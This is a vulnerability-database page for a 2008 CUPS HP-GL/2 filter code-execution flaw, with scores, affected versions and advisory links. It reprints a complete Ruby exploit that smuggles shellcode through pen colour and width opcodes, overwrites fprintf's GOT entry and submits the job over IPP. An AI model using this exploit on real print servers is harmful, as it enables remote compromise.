Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The Hewlett-Packard Graphics Language (HPGL) filter in CUPS before 1.3.9 allows remote attackers to execute arbitrary code via crafted pen width and pen color opcodes that overwrite arbitrary memory.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 32470
Publication date : 2008-10-08 22h00 +00:00
Author : regenrecht
EDB Verified : Yes
source: https://www.securityfocus.com/bid/31688/info
CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Note that local users may also exploit this vulnerability to elevate privileges.
Successful remote exploits may require printer sharing to be enabled on the vulnerable system.
The issue affects versions prior to CUPS 1.3.9.
NOTE: This issue was previously discussed in BID 31681 (Apple Mac OS X 2008-007 Multiple Security Vulnerabilities), but has been assigned its own record to better document the vulnerability.
#!/usr/bin/ruby -w
# CUPS 1.3.7 (HP-GL/2 filter) remote code execution
# gives uid=2(daemon) gid=7(lp) groups=7(lp)
# linux 2.6.25/randomize_va_space = 1, glibc 2.7
#
# An Introduction to HP-GL/2 Graphics
# http://www.tech-diy.com/HP%20Graphics%20Language.htm
# Internet Printing Protocol/1.1: Encoding and Transport
# http://tools.ietf.org/html/rfc2910
# Internet Printing Protocol/1.1: Model and Semantics
# http://tools.ietf.org/html/rfc2911
# :::::::::::::::::::::::::::::::::: setup ::::::::::::::::::::::::::::::::::
host = '127.0.0.1'
port = 631
printer = 'Virtual_Printer'
Pens_addr = 0x08073600 # objdump -T hpgltops | grep Pens$
fprintf_got = 0x080532cc # objdump -R hpgltops | grep fprintf
# linux_ia32_exec - CMD=/bin/touch /tmp/yello Size=84, metasploit.com
# encoder=PexFnstenvSub, restricted chars: 0xff
shellcode =
"\x2b\xc9\x83\xe9\xf1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7c" +
"\x48\x22\xd6\x83\xeb\xfc\xe2\xf4\x16\x43\x7a\x4f\x2e\x2e\x4a\xfb" +
"\x1f\xc1\xc5\xbe\x53\x3b\x4a\xd6\x14\x67\x40\xbf\x12\xc1\xc1\x84" +
"\x94\x5e\x22\xd6\x7c\x67\x40\xbf\x12\x67\x56\xb9\x09\x2b\x4a\xf6" +
"\x53\x3c\x4f\xa6\x53\x31\x47\xba\x10\x27\x22\x81\x2f\xc1\xc3\x1b" +
"\xfc\x48\x22\xd6";
# :::::::::::::::::::::::::::::::::: code :::::::::::::::::::::::::::::::::::
# beacause of hpgl-attr.c:68-73 and 269-274
def CR_setup()
"CR0,1,0,1,0,1;"
end
# PS is a bit tricky here. final weight of pen (PW code) is calculated as:
# weight*=hypot(ps[0],ps[1])/1016.0*72.0 (which is NOT hypot/73152.0),
# where ps0=72.0*arg1/1016.0 and ps1=72.0*arg2/1016.0.
# so, hoping to get things accurate I set multiplier to 1.0
def PS_setup()
"WU1;" + # set the units used for pen widths
"RO0;" + # (do not) rotate the plot
"PS0,199.123455;"; # set the plot size
end
# alternative approach to fight floating point rounding errors
# first one seems to be more successful, though
def PS_setup_alt()
"WU0;" +
"RO0;";
end
# set the pen width (PS!)
def PW(width, pen)
"PW#{width},#{pen};"
end
def PW_alt(width, pen)
"PW#{width*25.4/72.0},#{pen};"
end
# "Set the pen color..."
def PC(pen, r, g, b)
"PC#{pen},#{r},#{g},#{b};"
end
# we'll be storing shellcode in Pens[1024] static buffer
# typedef struct
# {
# float rgb[3]; /* Pen color */
# float width; /* Pen width */
# } pen_t;
def memcpy(data)
while (data.length % 16 != 0)
data += "\x90";
end
s = ''
a = 0, b = 0, i = 0
data.unpack('f*').each { |f|
case ((i += 1) % 4)
when 1: a = f
when 2: b = f
when 3: s += PC(i/4, a, b, f)
else s += PW(f, (i-1)/4)
end
}
return s;
end
# overwrite all 16 bytes with the same value
def poke(addr, value)
f = [value].pack('i').unpack('f') # floatyfication!
i = (addr-Pens_addr)/16
return PC(i, f, f, f) + PW(f, i)
end
hpgl_data =
"BP;" + # to be recognized by CUPS
CR_setup() +
PS_setup() +
memcpy(shellcode) +
poke(fprintf_got, Pens_addr) +
PC(0, 0, 0, 0); # whatever
def attribute(tag, name, value)
[tag].pack('C') +
[name.length].pack('n') +
name +
[value.length].pack('n') +
value
end
# tag - meaning (rfc2910#section-3.5)
# 0x42 nameWithoutLanguage
# 0x45 uri
# 0x47 charset
# 0x48 naturalLanguage
operation_attr =
attribute(0x47, 'attributes-charset', 'utf-8') +
attribute(0x48, 'attributes-natural-language', 'en-us') +
attribute(0x45, 'printer-uri', "http://#{host}:#{port}/printers/#{printer}") +
attribute(0x42, 'job-name', 'zee greeteengz') +
attribute(0x42, 'document-format', 'application/vnd.hp-HPGL');
ipp_data =
"\x01\x00" + # version-number: 1.0
"\x00\x02" + # operation-id: Print-job
"\x00\x00\x00\x01" + # request-id: 1
"\x01" + # operation-attributes-tag
operation_attr +
"\x02" + # job-attributes-tag
"\x03" + # end-of-attributes-tag
hpgl_data;
http_request =
"""POST /printers/#{printer} HTTP/1.1
Content-Type: application/ipp
User-Agent: Internet Print Provider
Host: #{host}
Content-Length: #{ipp_data.length}
Connection: Keep-Alive
Cache-Control: no-cache
"""
require 'socket'
NL = "\r\n"
if (false)
# ./hpgltops 0 none none 1 '' output.hpgl
puts hpgl_data
puts "[+] dumping HP/GL-2 into output.hpgl"
f = File.new('output.hpgl', 'w')
f.write(hpgl_data)
f.close()
exit(0)
end
puts "[+] connecting to #{host}:#{port}"
s = TCPSocket.open(host, port)
puts "[+] asking #{printer} for a printout"
http_request.each_line { |line|
s.write(line.strip + NL)
}
s.write(NL)
s.write(ipp_data)
s.read(1)
s.close()
puts "[+] done"
Products Mentioned
Configuraton 0
Apple>>Cups >> Version To (including) 1.3.8
- Apple>>Cups >> Version - (Open CPE detail)
- Apple>>Cups >> Version 1.1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.1.4 (Open CPE detail)
- Apple>>Cups >> Version 1.1.5 (Open CPE detail)
- Apple>>Cups >> Version 1.1.5-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.5-2 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6-2 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6-3 (Open CPE detail)
- Apple>>Cups >> Version 1.1.7 (Open CPE detail)
- Apple>>Cups >> Version 1.1.8 (Open CPE detail)
- Apple>>Cups >> Version 1.1.9 (Open CPE detail)
- Apple>>Cups >> Version 1.1.9-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.10 (Open CPE detail)
- Apple>>Cups >> Version 1.1.10-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.11 (Open CPE detail)
- Apple>>Cups >> Version 1.1.12 (Open CPE detail)
- Apple>>Cups >> Version 1.1.13 (Open CPE detail)
- Apple>>Cups >> Version 1.1.14 (Open CPE detail)
- Apple>>Cups >> Version 1.1.15 (Open CPE detail)
- Apple>>Cups >> Version 1.1.16 (Open CPE detail)
- Apple>>Cups >> Version 1.1.17 (Open CPE detail)
- Apple>>Cups >> Version 1.1.18 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2.0 (Open CPE detail)
- Apple>>Cups >> Version 1.2.1 (Open CPE detail)
- Apple>>Cups >> Version 1.2.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2.3 (Open CPE detail)
- Apple>>Cups >> Version 1.2.4 (Open CPE detail)
- Apple>>Cups >> Version 1.2.5 (Open CPE detail)
- Apple>>Cups >> Version 1.2.6 (Open CPE detail)
- Apple>>Cups >> Version 1.2.7 (Open CPE detail)
- Apple>>Cups >> Version 1.2.8 (Open CPE detail)
- Apple>>Cups >> Version 1.2.9 (Open CPE detail)
- Apple>>Cups >> Version 1.2.10 (Open CPE detail)
- Apple>>Cups >> Version 1.2.11 (Open CPE detail)
- Apple>>Cups >> Version 1.2.12 (Open CPE detail)
- Apple>>Cups >> Version 1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3.0 (Open CPE detail)
- Apple>>Cups >> Version 1.3.1 (Open CPE detail)
- Apple>>Cups >> Version 1.3.2 (Open CPE detail)
- Apple>>Cups >> Version 1.3.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3.4 (Open CPE detail)
- Apple>>Cups >> Version 1.3.5 (Open CPE detail)
- Apple>>Cups >> Version 1.3.6 (Open CPE detail)
- Apple>>Cups >> Version 1.3.7 (Open CPE detail)
- Apple>>Cups >> Version 1.3.8 (Open CPE detail)
Apple>>Cups >> Version 1.1
- Apple>>Cups >> Version 1.1 (Open CPE detail)
Apple>>Cups >> Version 1.1.1
- Apple>>Cups >> Version 1.1.1 (Open CPE detail)
Apple>>Cups >> Version 1.1.2
- Apple>>Cups >> Version 1.1.2 (Open CPE detail)
Apple>>Cups >> Version 1.1.3
- Apple>>Cups >> Version 1.1.3 (Open CPE detail)
Apple>>Cups >> Version 1.1.4
- Apple>>Cups >> Version 1.1.4 (Open CPE detail)
Apple>>Cups >> Version 1.1.5
- Apple>>Cups >> Version 1.1.5 (Open CPE detail)
Apple>>Cups >> Version 1.1.5-1
- Apple>>Cups >> Version 1.1.5-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.5-2
- Apple>>Cups >> Version 1.1.5-2 (Open CPE detail)
Apple>>Cups >> Version 1.1.6
- Apple>>Cups >> Version 1.1.6 (Open CPE detail)
Apple>>Cups >> Version 1.1.6-1
- Apple>>Cups >> Version 1.1.6-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.6-2
- Apple>>Cups >> Version 1.1.6-2 (Open CPE detail)
Apple>>Cups >> Version 1.1.6-3
- Apple>>Cups >> Version 1.1.6-3 (Open CPE detail)
Apple>>Cups >> Version 1.1.7
- Apple>>Cups >> Version 1.1.7 (Open CPE detail)
Apple>>Cups >> Version 1.1.8
- Apple>>Cups >> Version 1.1.8 (Open CPE detail)
Apple>>Cups >> Version 1.1.9
- Apple>>Cups >> Version 1.1.9 (Open CPE detail)
Apple>>Cups >> Version 1.1.9-1
- Apple>>Cups >> Version 1.1.9-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.10
- Apple>>Cups >> Version 1.1.10 (Open CPE detail)
Apple>>Cups >> Version 1.1.10-1
- Apple>>Cups >> Version 1.1.10-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.11
- Apple>>Cups >> Version 1.1.11 (Open CPE detail)
Apple>>Cups >> Version 1.1.12
- Apple>>Cups >> Version 1.1.12 (Open CPE detail)
Apple>>Cups >> Version 1.1.13
- Apple>>Cups >> Version 1.1.13 (Open CPE detail)
Apple>>Cups >> Version 1.1.14
- Apple>>Cups >> Version 1.1.14 (Open CPE detail)
Apple>>Cups >> Version 1.1.15
- Apple>>Cups >> Version 1.1.15 (Open CPE detail)
Apple>>Cups >> Version 1.1.16
- Apple>>Cups >> Version 1.1.16 (Open CPE detail)
Apple>>Cups >> Version 1.1.17
- Apple>>Cups >> Version 1.1.17 (Open CPE detail)
Apple>>Cups >> Version 1.1.18
- Apple>>Cups >> Version 1.1.18 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.21
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
Apple>>Cups >> Version 1.1.21
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
Apple>>Cups >> Version 1.1.21
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
Apple>>Cups >> Version 1.1.22
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
Apple>>Cups >> Version 1.1.22
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
Apple>>Cups >> Version 1.1.22
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
Apple>>Cups >> Version 1.1.23
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
Apple>>Cups >> Version 1.1.23
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2.0
- Apple>>Cups >> Version 1.2.0 (Open CPE detail)
Apple>>Cups >> Version 1.2.1
- Apple>>Cups >> Version 1.2.1 (Open CPE detail)
Apple>>Cups >> Version 1.2.2
- Apple>>Cups >> Version 1.2.2 (Open CPE detail)
Apple>>Cups >> Version 1.2.3
- Apple>>Cups >> Version 1.2.3 (Open CPE detail)
Apple>>Cups >> Version 1.2.4
- Apple>>Cups >> Version 1.2.4 (Open CPE detail)
Apple>>Cups >> Version 1.2.5
- Apple>>Cups >> Version 1.2.5 (Open CPE detail)
Apple>>Cups >> Version 1.2.6
- Apple>>Cups >> Version 1.2.6 (Open CPE detail)
Apple>>Cups >> Version 1.2.7
- Apple>>Cups >> Version 1.2.7 (Open CPE detail)
Apple>>Cups >> Version 1.2.8
- Apple>>Cups >> Version 1.2.8 (Open CPE detail)
Apple>>Cups >> Version 1.2.9
- Apple>>Cups >> Version 1.2.9 (Open CPE detail)
Apple>>Cups >> Version 1.2.10
- Apple>>Cups >> Version 1.2.10 (Open CPE detail)
Apple>>Cups >> Version 1.2.11
- Apple>>Cups >> Version 1.2.11 (Open CPE detail)
Apple>>Cups >> Version 1.2.12
- Apple>>Cups >> Version 1.2.12 (Open CPE detail)
Apple>>Cups >> Version 1.3
- Apple>>Cups >> Version 1.3 (Open CPE detail)
Apple>>Cups >> Version 1.3
- Apple>>Cups >> Version 1.3 (Open CPE detail)
Apple>>Cups >> Version 1.3
- Apple>>Cups >> Version 1.3 (Open CPE detail)
Apple>>Cups >> Version 1.3.0
- Apple>>Cups >> Version 1.3.0 (Open CPE detail)
Apple>>Cups >> Version 1.3.1
- Apple>>Cups >> Version 1.3.1 (Open CPE detail)
Apple>>Cups >> Version 1.3.2
- Apple>>Cups >> Version 1.3.2 (Open CPE detail)
Apple>>Cups >> Version 1.3.3
- Apple>>Cups >> Version 1.3.3 (Open CPE detail)
Apple>>Cups >> Version 1.3.4
- Apple>>Cups >> Version 1.3.4 (Open CPE detail)
Apple>>Cups >> Version 1.3.5
- Apple>>Cups >> Version 1.3.5 (Open CPE detail)
Apple>>Cups >> Version 1.3.6
- Apple>>Cups >> Version 1.3.6 (Open CPE detail)
Apple>>Cups >> Version 1.3.7
- Apple>>Cups >> Version 1.3.7 (Open CPE detail)
References
http://sunsolve.sun.com/search/document.do?assetkey=1-26-261088-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.mandriva.com/security/advisories?name=MDVSA-2008:211
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.gentoo.org/security/en/glsa/glsa-200812-11.xml
Tags : vendor-advisory, x_refsource_GENTOO
Tags : vendor-advisory, x_refsource_GENTOO
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9666
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00380.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00331.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00006.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00004.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://www.securityfocus.com/archive/1/497221/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.